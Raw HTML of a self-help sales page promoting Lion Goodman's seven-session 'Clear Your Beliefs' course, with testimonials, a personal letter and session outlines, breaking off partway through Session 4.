Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" 